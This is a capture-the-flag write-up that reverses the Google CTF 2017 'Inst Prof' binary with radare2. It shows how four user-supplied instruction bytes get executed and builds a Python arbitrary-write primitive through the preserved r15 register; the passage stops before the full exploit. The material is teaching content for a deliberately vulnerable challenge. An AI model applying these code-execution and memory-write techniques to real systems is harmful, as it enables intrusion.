GoogleCTF 2017: Inst Prof 152 (final value)

This was a very enjoyable and well thought out challenge from Google CTF. I'd never participated in a Google CTF before, and my expectations were high in terms of difficulty. Needless to say, I was not disappointed in the difficulty department. About halfway through I began thinking of this challenge as the "Instruction Professor" - as in, x86-64 assembly instruction - due to the inordinate amount of x86 assembly I was manually typing out and grokking.

Despite the extreme low-leveledness of the challenge work, I had tons of fun solving this challenge, and learned quite a bit more about linux, memory, and myself in the process.

If you're just looking for my solution itself (instead of a journaling of my process), simply click here to jump to the solution. If, however, you'd like a little insight into my thought process and techniques involved, please read on.

I've split this writeup into two parts, Reversing and Pwning .

Reversing - In this section I'll go over how I use radare2 to understand how the challenge works. I provide examples and explanations of commands where I can. This section is geared toward those who are less familiar with radare2 or with assembly/reversing in general.

Pwning - This section will illustrate how the challenge program was exploited. I'll go over some early strategies and discoveries that were made, as well as what the solution script does in detail.

Reversing the Binary

After firing up the scoreboard on Friday, I saw the lowest point pwn challenge was Inst Prof , so I puzzled briefly over the flavor text and downloaded the binary:

Please help test our new compiler micro-service Challenge running at inst-prof.ctfcompetition.com:1337 inst_prof

I took a look at some of the details of the binary:

-> % checksec --file ./ inst_prof RELRO STACK CANARY NX PIE RPATH RUNPATH FILE Partial RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH ./ inst_prof -> % file ./ inst_prof ./ inst_prof: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter / lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=61e50b540c3c8e7bcef3cb73f3ad2a10c2589089, not stripped

The thing that stood out to me was that PIE (Position Independent Executable) was turned on, and that NX (No eXecute) was set. Undeterred, I proceeded to shift into mad (computer) scientist mode, and started poking the beast.

I went ahead and ran the program to see what it did. It seemed to sleep() for a few seconds before printing ready :

-> % ./ inst_prof initializing prof...ready HERPDERP [1] 19938 segmentation fault (core dumped) ./inst_prof.bak

The most immediate thought I had was that I need to get rid of the sleep(), otherwise playing with the binary would be pain every time I went to start it up. So that was step 1:

Brain Surgery

I opened the binary with radare2 using r2 -d inst_prof to get a better look at what was happening:

[ 0x7f6844843d80 ] > s main [ 0x559b6f54c860 ] > pd 30 ;-- main: ;-- section_end..plt: ;-- section..text: ;-- main: 0x559b6f54c860 55 push rbp ; section 13 va=0x559b6f54c860 pa=0x00000860 sz=882 vsz=882 rwx=--r-x .text 0x559b6f54c861 488d357c0300. lea rsi , qword str . initializing_prof... ; 0x559b6f54cbe4 ; "initializing prof..." 0x559b6f54c868 ba14000000 mov edx , 0x14 ; 20 0x559b6f54c86d bf01000000 mov edi , 1 0x559b6f54c872 4889e5 mov rbp , rsp 0x559b6f54c875 e836ffffff call sym . imp . write 0x559b6f54c87a 4883f814 cmp rax , 0x14 ; 20 ,=< 0x559b6f54c87e 7407 je 0x559b6f54c887 .--> 0x559b6f54c880 31ff xor edi , edi || 0x559b6f54c882 e8a9ffffff call sym . imp . exit |`-> 0x559b6f54c887 bf05000000 mov edi , 5 | 0x559b6f54c88c e8afffffff call sym . imp . sleep | 0x559b6f54c891 bf1e000000 mov edi , 0x1e ; 30 | 0x559b6f54c896 e835ffffff call sym . imp . alarm | 0x559b6f54c89b 488d35570300. lea rsi , qword str . ready_n ; 0x559b6f54cbf9 ; "ready

" | 0x559b6f54c8a2 ba06000000 mov edx , 6 | 0x559b6f54c8a7 bf01000000 mov edi , 1 | 0x559b6f54c8ac e8fffeffff call sym . imp . write | 0x559b6f54c8b1 4883f806 cmp rax , 6 ; 6 `==< 0x559b6f54c8b5 75c9 jne 0x559b6f54c880 0x559b6f54c8b7 660f1f840000. nop word [ rax + rax ] .-> 0x559b6f54c8c0 31c0 xor eax , eax | 0x559b6f54c8c2 e8f9010000 call sym . do_test `=< 0x559b6f54c8c7 ebf7 jmp 0x559b6f54c8c0

s lets you seek to an address (or symbol) pd # lets you print disassembly of # instructions (from current seek)

Above is the disassembly output of the main function. My eyes were drawn to the three highlighted lines: Calls to sleep() , alarm() , and do_test() .

From past CTF experience I knew that sleep() and alarm() were both used as mild deterrents that could easily be disabled. If we look at the arg0 s for both of these functions (in the edi register), we'll see that they're taking five and thirty seconds respectively.

Five seconds was the delay experienced after seeing the initializing prof... message, and indeed we can see above that both the sleep and alarm function calls occur between the write s to STDOUT .

Before moving on to inspecting the do_test function, I performed my first operation:

-> % r2 -w inst_prof [ 0x000008c9 ] > wx 9090909090 @ 0x88c [ 0x000008c9 ] > wx 9090909090 @ 0x896 [ 0x000008c9 ] > s main [ 0x00000860 ] > pd 32 ;-- main: ;-- section_end..plt: ;-- section..text: ;-- main: 0x00000860 55 push rbp ; section 13 va=0x00000860 pa=0x00000860 sz=882 vsz=882 rwx=--r-x .text 0x00000861 488d357c0300. lea rsi , qword str . initializing_prof... ; 0xbe4 ; "initializing prof..." 0x00000868 ba14000000 mov edx , 0x14 0x0000086d bf01000000 mov edi , 1 0x00000872 4889e5 mov rbp , rsp 0x00000875 e836ffffff call sym . imp . write 0x0000087a 4883f814 cmp rax , 0x14 ,=< 0x0000087e 7407 je 0x887 .--> 0x00000880 31ff xor edi , edi || 0x00000882 e8a9ffffff call sym . imp . exit |`-> 0x00000887 bf05000000 mov edi , 5 | 0x0000088c 90 nop | 0x0000088d 90 nop | 0x0000088e 90 nop | 0x0000088f 90 nop | 0x00000890 90 nop | 0x00000891 bf1e000000 mov edi , 0x1e | 0x00000896 90 nop | 0x00000897 90 nop | 0x00000898 90 nop | 0x00000899 90 nop | 0x0000089a 90 nop | 0x0000089b 488d35570300. lea rsi , qword str . ready_n ; 0xbf9 ; "ready

" | 0x000008a2 ba06000000 mov edx , 6 | 0x000008a7 bf01000000 mov edi , 1 | 0x000008ac e8fffeffff call sym . imp . write | 0x000008b1 4883f806 cmp rax , 6 `==< 0x000008b5 75c9 jne 0x880 0x000008b7 660f1f840000. nop word [ rax + rax ] .-> 0x000008c0 31c0 xor eax , eax | 0x000008c2 e8f9010000 call sym . do_test `=< 0x000008c7 ebf7 jmp 0x8c0

Invoking radare2 with the -w switch opens the binary file in write mode, allowing radare2 to write data to the file. The wx command is short for w rite he x , and allows for writing raw bytes to an offset specified by either the current seek or @ a temporary seek offset. Notice that the addresses (left column) no longer represent virtual addresses of a process, but rather absolute addresses of a file on disk. Then notice that the least significant 12 bits are the same in the file as in the process! This has to do with the fact that the base address that the text section of the binary is loaded into (when it becomes a process) will always have the least significant 12 bits unset (all 0's)!

We can see that the two commands issued wrote 0x90 five times for each address 0x88c and 0x896 , which fully overwrote both the sleep and alarm calls with nop s. So now the binary will no longer pause or get the alarm signal sent to it (which may or may not have broken something later down the road).

Under the Microscope

Now that the speed bumps were removed, it was time to take a look at the do_test function. I took note that the instruction after calling do_test is an unconditional jmp to clearing the eax register just before calling the same function; an endless loop.

Then I disassembled the function:

[ 0x562bd0896860 ] > pd @ sym.do_test ;-- do_test: 0x562bd0896ac0 55 push rbp 0x562bd0896ac1 31c0 xor eax , eax 0x562bd0896ac3 4889e5 mov rbp , rsp 0x562bd0896ac6 4154 push r12 0x562bd0896ac8 53 push rbx 0x562bd0896ac9 4883ec10 sub rsp , 0x10 0x562bd0896acd e81effffff call sym . alloc_page 0x562bd0896ad2 4889c3 mov rbx , rax 0x562bd0896ad5 488d05240100. lea rax , qword sym . template ; obj.template ; 0x562bd0896c00 0x562bd0896adc 488d7b05 lea rdi , qword [ rbx + 5 ] ; 5 0x562bd0896ae0 488b10 mov rdx , qword [ rax ] 0x562bd0896ae3 488913 mov qword [ rbx ] , rdx 0x562bd0896ae6 8b5008 mov edx , dword [ rax + 8 ] ; [0x8:4]=-1 ; 8 0x562bd0896ae9 895308 mov dword [ rbx + 8 ] , edx 0x562bd0896aec 0fb7500c movzx edx , word [ rax + 0xc ] ; [0xc:2]=0xffff ; 12 0x562bd0896af0 0fb6400e movzx eax , byte [ rax + 0xe ] ; [0xe:1]=255 ; 14 0x562bd0896af4 6689530c mov word [ rbx + 0xc ] , dx 0x562bd0896af8 88430e mov byte [ rbx + 0xe ] , al 0x562bd0896afb e8b0ffffff call sym . read_inst 0x562bd0896b00 4889df mov rdi , rbx 0x562bd0896b03 e818ffffff call sym . make_page_executable 0x562bd0896b08 0f31 rdtsc 0x562bd0896b0a 48c1e220 shl rdx , 0x20 0x562bd0896b0e 4989c4 mov r12 , rax 0x562bd0896b11 31c0 xor eax , eax 0x562bd0896b13 4909d4 or r12 , rdx 0x562bd0896b16 ffd3 call rbx 0x562bd0896b18 0f31 rdtsc 0x562bd0896b1a bf01000000 mov edi , 1 0x562bd0896b1f 48c1e220 shl rdx , 0x20 0x562bd0896b23 488d75e8 lea rsi , qword [ rbp - 0x18 ] 0x562bd0896b27 4809c2 or rdx , rax 0x562bd0896b2a 4c29e2 sub rdx , r12 0x562bd0896b2d 488955e8 mov qword [ rbp - 0x18 ] , rdx 0x562bd0896b31 ba08000000 mov edx , 8 0x562bd0896b36 e875fcffff call sym . imp . write 0x562bd0896b3b 4883f808 cmp rax , 8 ; 8 ,=< 0x562bd0896b3f 7511 jne 0x562bd0896b52 | 0x562bd0896b41 4889df mov rdi , rbx | 0x562bd0896b44 e8f7feffff call sym . free_page | 0x562bd0896b49 4883c410 add rsp , 0x10 | 0x562bd0896b4d 5b pop rbx | 0x562bd0896b4e 415c pop r12 | 0x562bd0896b50 5d pop rbp | 0x562bd0896b51 c3 ret `-> 0x562bd0896b52 31ff xor edi , edi 0x562bd0896b54 e8d7fcffff call sym . imp . exit 0x562bd0896b59 0f1f80000000. nop dword [ rax ]

We can see above in the disassembly the calls that do_test makes, which I've highlighted. Of particular interest is the call rbx instruction which comes after the make_page_executable function. Without digging deeper, my assumption for why the program crashed was that it was expecting me to input x86 instructions (in read_inst ) that would get executed (after make_page_executable ), which HERPDERP definitely was not.

To see if this was right, I needed to look at the three calls before the one to rbx .

Pagemaster

First I looked at alloc_page :

[ 0x5635884f4ac0 ] > pd @ sym.alloc_page ||| ;-- alloc_page: ||| 0x5635884f49f0 55 push rbp ||| 0x5635884f49f1 4531c9 xor r9d , r9d ||| 0x5635884f49f4 41b8ffffffff mov r8d , 0xffffffff ; -1 ||| 0x5635884f49fa b922000000 mov ecx , 0x22 ; '"' ; 34 ||| 0x5635884f49ff ba03000000 mov edx , 3 ||| 0x5635884f4a04 be00100000 mov esi , 0x1000 ||| 0x5635884f4a09 4889e5 mov rbp , rsp ||| 0x5635884f4a0c 31ff xor edi , edi ||| 0x5635884f4a0e 5d pop rbp ||`=< 0x5635884f4a0f e9acfdffff jmp sym . imp . mmap || 0x5635884f4a14 6666662e0f1f. nop word cs: [ rax + rax ]

Which I saw made a call to mmap . Looking at the man page for mmap using man 2 mmap revealed the function signature:

void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);

as well as some additional information about the parameters, especially the prot parameter, which is supplied as a bitwise OR of the following:

-> % cat /usr/include/bits/mman-linux.h | grep -P '#define\s+PROT' #define PROT_READ 0x1 /* Page can be read. */ #define PROT_WRITE 0x2 /* Page can be written. */ #define PROT_EXEC 0x4 /* Page can be executed. */ #define PROT_NONE 0x0 /* Page can not be accessed. */ #define PROT_GROWSDOWN 0x01000000 /* Extend change to start of #define PROT_GROWSUP 0x02000000 /* Extend change to start of

Since we know that the arguments on x86-64 are supplied in the registers rdi , rsi , rdx , rcx , r8 , r9 , we can see the call to mmap is made as:

mmap(0, 0x1000, PROT_READ | PROT_WRITE, 0x22, 0xffffffff, 0)

This creates a new mapped region of memory that is 0x1000 bytes large, at a starting offset chosen by the kernel, that is readable and writable. The start address of the mmap ed region is returned in the rax register.

Looking back at the above disassembly of do_test , I saw after the alloc_page that something was ocurring before the read_inst call involving something that radare labeled as obj.template .

Before trying to understand the code, I took a look at the obj.template :

[ 0x5635884f4ac0 ] > pxq 0x10 @ obj.template 0x5635884f4c00 0x90909000001000b9 0x00c3f77501e98390 ............u... [ 0x5635884f4ac0 ] > pd 8 @ obj.template ;-- template: 0x5635884f4c00 b900100000 mov ecx , 0x1000 .-> 0x5635884f4c05 90 nop | 0x5635884f4c06 90 nop | 0x5635884f4c07 90 nop | 0x5635884f4c08 90 nop | 0x5635884f4c09 83e901 sub ecx , 1 `=< 0x5635884f4c0c 75f7 jne 0x5635884f4c05 0x5635884f4c0e c3 ret

The pxq # command prints # hex quadwords (in little endian) at the offset specified (obj.template in this case).

Hmm, it looks as if the obj.template is potentially a loop function of some sort. It appears to execute nop four times in a loop which repeats 0x1000 times.

Taking a long look at the assembly which references this obj.template gave me an understanding of what it did with it:

0x5635884f4acd e81effffff call sym . alloc_page 0x5635884f4ad2 4889c3 mov rbx , rax ;save addr of new page (from rax) 0x5635884f4ad5 488d05240100. lea rax , qword obj . template ;load obj.template addr 0x5635884f4adc 488d7b05 lea rdi , qword [ rbx + 5 ] ;seek 5 into new page 0x5635884f4ae0 488b10 mov rdx , qword [ rax ] ;copy first 8 bytes of obj.template 0x5635884f4ae3 488913 mov qword [ rbx ] , rdx ;paste them into new page 0x5635884f4ae6 8b5008 mov edx , dword [ rax + 8 ] ;copy template bytes 0x8 to 0xb 0x5635884f4ae9 895308 mov dword [ rbx + 8 ] , edx ;paste into bytes 0x8 to 0xb 0x5635884f4aec 0fb7500c movzx edx , word [ rax + 0xc ] ;copy template bytes 0xc and 0xd 0x5635884f4af0 0fb6400e movzx eax , byte [ rax + 0xe ] ;copy last template byte 0x5635884f4af4 6689530c mov word [ rbx + 0xc ] , dx ;paste template bytes 0xc and 0xd 0x5635884f4af8 88430e mov byte [ rbx + 0xe ] , al ;paste last template byte (0xe) 0x5635884f4afb e8b0ffffff call sym . read_inst

If that was still unclear, essentially the template bytes are copied into the start of the newly allocated page we got from alloc_page .

Up to this point I'd only been taking a look at the code statically, however I decided to run it to check my understanding. I ran the code after setting breakpoints on both the alloc_page and read_inst calls:

[ 0x5635884f4ac0 ] > db 0x5635884f4acd [ 0x5635884f4ac0 ] > db 0x5635884f4afb [ 0x5635884f4ac0 ] > dc Selecting and continuing : 2864 initializing prof ... ready hit breakpoint at : 5635884f4acd [ 0x5635884f4acd ] > dr rax 0x00000000 [ 0x5635884f4acd ] > dso hit breakpoint at : 5635884f4ad2 [ 0x5635884f4acd ] > dr rax 0x7f0f9b91c000 [ 0x5635884f4acd ] > pxq 0x10 @ 0x7f0f9b91c000 0x7f0f9b91c000 0x0000000000000000 0x0000000000000000 ................ [ 0x5635884f4acd ] > dc Selecting and continuing : 2864 hit breakpoint at : 5635884f4afb [ 0x5635884f4acd ] > pxq 0x10 @ 0x7f0f9b91c000 0x7f0f9b91c000 0x90909000001000b9 0x00c3f77501e98390 ............u...

db is the debug breakpoint command; dc is the debug continue command dr is the debug register command; dso is the debug step over command

From the above output I verified that the obj.template data was copied into the region mapped by alloc_page , and using the dm (debug memory [map]) command showed me that a new page had been mapped for the process (highlighted):

[ 0x5635884f4acd ] > dm sys 4K 0x00005635884f4000 * 0x00005635884f5000 s -r-x / googleCTF _ 06 - 2017 / pwn _ inst - prof / inst _ prof ; map ._ googleCTF _ 06 _ 2017 _ pwn _ inst _ prof _ inst _ prof ._ r _ x sys 4K 0x00005635886f5000 - 0x00005635886f6000 s -r-- / googleCTF _ 06 - 2017 / pwn _ inst - prof / inst _ prof ; map ._ googleCTF _ 06 _ 2017 _ pwn _ inst _ prof _ inst _ prof ._ rw _ sys 4K 0x00005635886f6000 - 0x00005635886f7000 s -rw- / googleCTF _ 06 - 2017 / pwn _ inst - prof / inst _ prof ; obj ._ GLOBAL _ OFFSET _ TABLE _ sys 1.6M 0x00007f0f9b357000 - 0x00007f0f9b4f2000 s -r-x / usr / lib / libc - 2 . 25 . so / usr / lib / libc - 2 . 25 . so sys 2.0M 0x00007f0f9b4f2000 - 0x00007f0f9b6f1000 s ---- / usr / lib / libc - 2 . 25 . so / usr / lib / libc - 2 . 25 . so sys 16K 0x00007f0f9b6f1000 - 0x00007f0f9b6f5000 s -r-- / usr / lib / libc - 2 . 25 . so / usr / lib / libc - 2 . 25 . so sys 8K 0x00007f0f9b6f5000 - 0x00007f0f9b6f7000 s -rw- / usr / lib / libc - 2 . 25 . so / usr / lib / libc - 2 . 25 . so sys 16K 0x00007f0f9b6f7000 - 0x00007f0f9b6fb000 s -rw- unk0 unk0 sys 140K 0x00007f0f9b6fb000 - 0x00007f0f9b71e000 s -r-x / usr / lib / ld - 2 . 25 . so / usr / lib / ld - 2 . 25 . so ; map ._ usr _ lib _ ld _ 2 . 25 . so ._ r _ x sys 8K 0x00007f0f9b8cc000 - 0x00007f0f9b8ce000 s -rw- unk1 unk1 sys 4K 0x00007f0f9b91c000 - 0x00007f0f9b91d000 s -rw- unk2 unk2 ; rbx sys 4K 0x00007f0f9b91d000 - 0x00007f0f9b91e000 s -r-- / usr / lib / ld - 2 . 25 . so / usr / lib / ld - 2 . 25 . so ; map ._ usr _ lib _ ld _ 2 . 25 . so ._ rw _ sys 4K 0x00007f0f9b91e000 - 0x00007f0f9b91f000 s -rw- / usr / lib / ld - 2 . 25 . so / usr / lib / ld - 2 . 25 . so sys 4K 0x00007f0f9b91f000 - 0x00007f0f9b920000 s -rw- unk3 unk3 ; map . unk0 ._ rw _ sys 132K 0x00007ffc046ac000 - 0x00007ffc046cd000 s -rw- [ stack ] [ stack ] ; map ._ stack _._ rw _ sys 8K 0x00007ffc0479e000 - 0x00007ffc047a0000 s -r-- [ vvar ] [ vvar ] ; map ._ vvar _._ r __ sys 8K 0x00007ffc047a0000 - 0x00007ffc047a2000 s -r-x [ vdso ] [ vdso ] ; map ._ vdso _._ r _ x sys 4K 0xffffffffff600000 - 0xffffffffff601000 s -r-x [ vsyscall ] [ vsyscall ] ; map ._ vsyscall _._ r _ x

So far, so good. Now I just had to look at and understand the remaining two functions in do_test : read_inst and make_page_executable .

Instruct Radare

[ 0x562e80db3ab0 ] > pd 6 @ sym.read_inst / ( fcn ) sym . read_inst 63 | sym . read_inst (); | | ; CALL XREF from 0x562e80db3afb (sym.do_test) | | 0x562e80db3ab0 55 push rbp | | 0x562e80db3ab1 be04000000 mov esi , 4 | | 0x562e80db3ab6 4889e5 mov rbp , rsp | | 0x562e80db3ab9 5d pop rbp \ `=< 0x562e80db3aba e9c1ffffff jmp sym . read_n 0x562e80db3abf 90 nop [ 0x562e80db3ab0 ] > pd @ sym.read_n .-> ;-- read_n: | ; JMP XREF from 0x562e80db3aba (sym.read_inst) | .-> 0x562e80db3a80 55 push rbp | | 0x562e80db3a81 4885f6 test rsi , rsi | | 0x562e80db3a84 4889e5 mov rbp , rsp | | 0x562e80db3a87 4154 push r12 | | 0x562e80db3a89 4c8d2437 lea r12 , qword [ rdi + rsi ] | | 0x562e80db3a8d 53 push rbx | | 0x562e80db3a8e 4889fb mov rbx , rdi | ,==< 0x562e80db3a91 7418 je 0x562e80db3aab | || 0x562e80db3a93 0f1f440000 nop dword [ rax + rax ] | .---> 0x562e80db3a98 31c0 xor eax , eax | ||| 0x562e80db3a9a 4883c301 add rbx , 1 | ||| 0x562e80db3a9e e8adffffff call sym . read_byte ; ssize_t read(int fildes, void *buf, size_t nbyte) | ||| 0x562e80db3aa3 8843ff mov byte [ rbx - 1 ] , al | ||| 0x562e80db3aa6 4c39e3 cmp rbx , r12 | `===< 0x562e80db3aa9 75ed jne 0x562e80db3a98 | `--> 0x562e80db3aab 5b pop rbx | | 0x562e80db3aac 415c pop r12 | | 0x562e80db3aae 5d pop rbp | | 0x562e80db3aaf c3 ret

We can see from the disassembly of read_inst above that the value of 4 is passed via the rsi register to read_n .

In the read_n function, rsi is immediately test ed, which would set the ZF flag (if it was 0) which would shortcut the function at the je call at address 0x562e80db3a91 . In our case, it's always set to 4 , and so the value is then used in combination with rdi with the instruction lea r12, qword [rdi + rsi] .

r12 is referenced before the jne call at 0x562e80db3aa9 , and is essentially acting as a counter for how many times call sym.read_byte is called, returning when then value passed via rsi ( 0x4 in our case) has been reached.

Looking at the read_byte function reveals:

[ 0x562e80db3ab0 ] > pd @ sym.read_byte / ( fcn ) sym . read_byte 47 | sym . read_byte (); | ; var int local_1h @ rbp-0x1 | ; CALL XREF from 0x562e80db3a9e (sym.read_inst) | 0x562e80db3a50 55 push rbp | 0x562e80db3a51 31ff xor edi , edi | 0x562e80db3a53 ba01000000 mov edx , 1 | 0x562e80db3a58 4889e5 mov rbp , rsp | 0x562e80db3a5b 4883ec10 sub rsp , 0x10 | 0x562e80db3a5f 488d75ff lea rsi , qword [local_ 1 h] | 0x562e80db3a63 c645ff00 mov byte [local_ 1 h] , 0 | 0x562e80db3a67 e874fdffff call sym . imp . read ; ssize_t read(int fildes, void *buf, size_t nbyte) | 0x562e80db3a6c 4883f801 cmp rax , 1 ; 1 | ,=< 0x562e80db3a70 7506 jne 0x562e80db3a78 | | 0x562e80db3a72 0fb645ff movzx eax , byte [local_ 1 h] | | 0x562e80db3a76 c9 leave | | 0x562e80db3a77 c3 ret | `-> 0x562e80db3a78 31ff xor edi , edi \ 0x562e80db3a7a e8b1fdffff call sym . imp . exit ; void exit(int status) 0x562e80db3a7f 90 nop

Here we finally see the call to sym.imp.read which is the libc function call which reads from STDIN a number of bytes.

I set a breakpoint on the line highlighted above to see what its parameters were:

[ 0x562e80db3ab0 ] > db 0x562e80db3a67 [ 0x562e80db3a67 ] > pd 1 | ;-- rip: | 0x562e80db3a67 b e874fdffff call sym . imp . read ; ssize_t read(int fildes, void *buf, size_t nbyte) [ 0x562e80db3a67 ] > dr rdi; dr rsi; dr rdx 0x00000000 0x7ffd632550af 0x00000001

We can see that it's reading from fd 0 (file descriptor 0) which is STDIN . It's reading into memory address 0x7ffd632550af , and reading only a single byte.

After reading a single character from STDIN, it returns the character in eax , which read_n writes to [rbx - 1]

I let the process run 4 times, sending 0xc3 each time, and stepped back until I was at do_test , where I found that the 4 bytes are read into the copied obj.template , which is currently stored at the address in rbx :

[ 0x55cc2a53eaf8 ] > pd 8 @ rbx ;-- map.unk2._rw_: ;-- rbx: 0x7feffd3ea000 b900100000 mov ecx , 0x1000 ,=> 0x7feffd3ea005 c3 ret | 0x7feffd3ea006 c3 ret | 0x7feffd3ea007 c3 ret | 0x7feffd3ea008 c3 ret | 0x7feffd3ea009 83e901 sub ecx , 1 `-< 0x7feffd3ea00c 75f7 jne 0x7feffd3ea005 0x7feffd3ea00e c3 ret

Notice that the 4 nop instructions from the template were overwritten with the bytes I supplied ( 0xc3 in this case).

Feeling comfortable that I understood everything so far, I took a look at make_page_executable .

It'll Give You Wings

Looking at do_test , we see just prior to calling make_page_executable , that our copied template section stored in rbx is moved into rdi :

[ 0x55cc2a53eb00 ] > pd 2 | ;-- rip: | 0x55cc2a53eb00 4889df mov rdi , rbx | 0x55cc2a53eb03 e818ffffff call sym . make_page_executable

Then when we look at make_page_executable :

[ 0x55cc2a53eb00 ] > pd @ sym.make_page_executable / ( fcn ) sym . make_page_executable 20 | sym . make_page_executable (); | || ; CALL XREF from 0x55cc2a53eb03 (sym.do_test) | || 0x55cc2a53ea20 55 push rbp | || 0x55cc2a53ea21 ba05000000 mov edx , 5 | || 0x55cc2a53ea26 be00100000 mov esi , 0x1000 | || 0x55cc2a53ea2b 4889e5 mov rbp , rsp | || 0x55cc2a53ea2e 5d pop rbp \ `==< 0x55cc2a53ea2f e9ecfdffff jmp sym . imp . mprotect

We see that it is just a wrapper around mprotect , which has the signature:

int mprotect(void *addr, size_t len, int prot)

This wrapped call to mprotect uses the address in rdi (our copied template with 4 custom instruction bytes) as the target addr ess. len is set via rsi being 0x1000 which is a 4k page, and prot is set via rdx being set to 0x05 , which marks the region as readable and executable.

Back in do_test , we see that rbx (which also holds the address to our copied template) is directly call ed, which will execute our 4 bytes worth of instructions in a 0x1000 loop before returning.

Once this is done, do_test calls write using a cycle count from rdtsc in rax in combination with the value in r12 . I didn't pay this much attention while solving the challenge, and would only later learn that I could have used this functionality to leak data from the process.

After this, the loop executable region with our custom bytes is freed, and the process is endlessly repeated with subsequent calls to do_test .

Pwnsploitation

The next day I met up with my friend Ambrose and we teamed up to go over our understanding of the binary as presented above, as well as to start in on the exploitation process.

After we had a solid understanding of what the binary did, the challenge was (seemingly) simple: we had to figure out how to use 1, 2, 3, and 4 byte assembly instructions to get a shell.

The first thing I did was generate a list of all 1 and 2 byte assembly instructions using the rasm2 binary that comes with radare just to get an idea of what kind of instructions we'd be able to use:

-> % ( python3 -c 'print("

".join([hex(x)[2:].zfill(2) for x in range(256)]))' | while read i ; do echo -n " $i = " ; rasm2 -ax86 -b64 -d " $i " ; done ; ) | grep -v invalid 50 = push rax 51 = push rcx 52 = push rdx 53 = push rbx 54 = push rsp 55 = push rbp 56 = push rsi 57 = push rdi 58 = pop rax 59 = pop rcx 5a = pop rdx 5b = pop rbx 5c = pop rsp 5d = pop rbp 5e = pop rsi 5f = pop rdi 6c = insb byte [ rdi ] , dx 6d = insd dword [ rdi ] , dx 6e = outsb dx, byte [ rsi ] 6f = outsd dx, dword [ rsi ] 90 = nop 91 = xchg eax, ecx 92 = xchg eax, edx 93 = xchg eax, ebx 94 = xchg eax, esp 95 = xchg eax, ebp 96 = xchg eax, esi 97 = xchg eax, edi 98 = cwde 99 = cdq 9b = wait 9c = pushfq 9d = popfq 9e = sahf 9f = lahf a4 = movsb byte [ rdi ] , byte ptr [ rsi ] a5 = movsd dword [ rdi ] , dword ptr [ rsi ] a6 = cmpsb byte [ rsi ] , byte ptr [ rdi ] a7 = cmpsd dword [ rsi ] , dword ptr [ rdi ] aa = stosb byte [ rdi ] , al ab = stosd dword [ rdi ] , eax ac = lodsb al, byte [ rsi ] ad = lodsd eax, dword [ rsi ] ae = scasb al, byte [ rdi ] af = scasd eax, dword [ rdi ] c3 = ret c9 = leave cb = retf cc = int3 cf = iretd d6 = salc d7 = xlatb ec = in al, dx ed = in eax, dx ee = out dx, al ef = out dx, eax f1 = int1 f4 = hlt f5 = cmc f8 = clc f9 = stc fa = cli fb = sti fc = cld fd = std -> % ( python3 -c 'print("

".join([hex(x)[2:].zfill(4) for x in range(256, 0x10000)]))' | while read i ; do echo -n " $i = " ; rasm2 -ax86 -b64 -d " $i " ; done ; ) | grep -v invalid <lots of assembly instructions redacted>

I was intent on compiling an exhaustive list of instructions we'd be allowed to use, but was running into some issues with the 3 byte instructions as there were 16777215 potential instructions to evaluate.

Meanwhile I asked my friend if he could see if any of the registers' states were saved in between the do_test loops.

It was then that I realized that sometimes it's not worth it to try solving a more general problem if you could just cut to the chase with some manual tests.

Revelation Registered

The breakthrough came when he discovered that the r15 and r14 registers were preserved across iterations of the do_test loop. I think he verified using a simple sequence like this:

[ 0x7f2d4994a000 ] > pd 8 ;-- map.unk2._rw_: ;-- rbx: ;-- rdi: ;-- rip: 0x7f2d4994a000 b900100000 mov ecx , 0x1000 ; rsi .-> 0x7f2d4994a005 90 nop | 0x7f2d4994a006 90 nop | 0x7f2d4994a007 90 nop | 0x7f2d4994a008 90 nop | 0x7f2d4994a009 83e901 sub ecx , 1 `=< 0x7f2d4994a00c 75f7 jne 0x7f2d4994a005 0x7f2d4994a00e c3 ret [ 0x7f2d4994a000 ] > dr r13; dr r14; dr r15 0x7ffc7df020c0 0x00000000 0x00000000 [ 0x7f2d4994a000 ] > dr r15=0xdeadbeef 0x00000000 -> 0xdeadbeef [ 0x7f2d4994a000 ] > dc [ 0x7f2d4994a000 ] > pd 8 ;-- map.unk2._rw_: ;-- rbx: ;-- rdi: ;-- rip: 0x7f2d4994a000 b900100000 mov ecx , 0x1000 ; rsi .-> 0x7f2d4994a005 90 nop | 0x7f2d4994a006 90 nop | 0x7f2d4994a007 90 nop | 0x7f2d4994a008 90 nop | 0x7f2d4994a009 83e901 sub ecx , 1 `=< 0x7f2d4994a00c 75f7 jne 0x7f2d4994a005 0x7f2d4994a00e c3 ret [ 0x7f2d4994a000 ] > dr r13; dr r14; dr r15 0x7ffc7df020c0 0x00000000 0xdeadbeef

dr can also directly set register values (in addition to displaying them) using the dr reg=... notation as shown in the first highlighted command above. At the second highlighted command above ( dc ), we had the STDIN of the binary attached to python so we could send it arbitrary bytes when the program used read() ( 0x90 * 4 in this case)

We can see that when setting the register value prior to continuing execution with dc that the register value ( r15 in this case) is preserved after arriving at the loop section a second time.

I also verified that r13 was preserved using the same method. I then scrapped my instruction-enumeration approach and tried assembling some useful instructions to see how big they were:

-> % rasm2 -ax86.ks -b64 'mov r15, rsp' 4989e7 -> % rasm2 -ax86.ks -b64 'mov [r15], rsp' 498927 -> % rasm2 -ax86.ks -b64 'mov [r15+8], rsp' 49896708 -> % rasm2 -ax86.ks -b64 'pop r15' 415f -> % rasm2 -ax86.ks -b64 'shl r15, 0x20' 49c1e720 -> % rasm2 -ax86.ks -b64 'sub rsp, 0x1000' 4881ec00100000 -> % rasm2 -ax86.ks -b64 'ret' c3

We realized here that there were some (what we called) absolute instructions and some relative instructions; some instructions like mov were not affected by being executed 0x1000 times in the loop, while others, like shl r15, 0x20 would not survive being run multiple times in a loop.

This was tied to the instruction length being 3 or 4 bytes. Where instructions that were 3 bytes in length could have a ret appended (one byte: c3 ) to escape the loop, instructions which were 4 bytes in length had to be run all 0x1000 times.

Instructions that were larger than 4 bytes (like the sub rsp, 0x1000 above) could not be run.

While I was still learning more about different x86 instructions, my friend put together a simple write data primitive:

def writeByteStr ( byteString ): writeCmd = ' \x41\xc6\x07 ' #mov byte [r15], {} incCmd = ' \x49\xff\xc7 ' #inc r15 for b in byteString : p . send ( writeCmd + b ) p . send ( incCmd + ret )

This function would write data to the address stored in the r15 register, incrementing it to keep the cursor position current after each written byte.

At this point we were able to write data as long as the address in r15 was in a writable segment, however we needed a game plan of what to write where (as well as how to get what address into r15 ).

Plan A

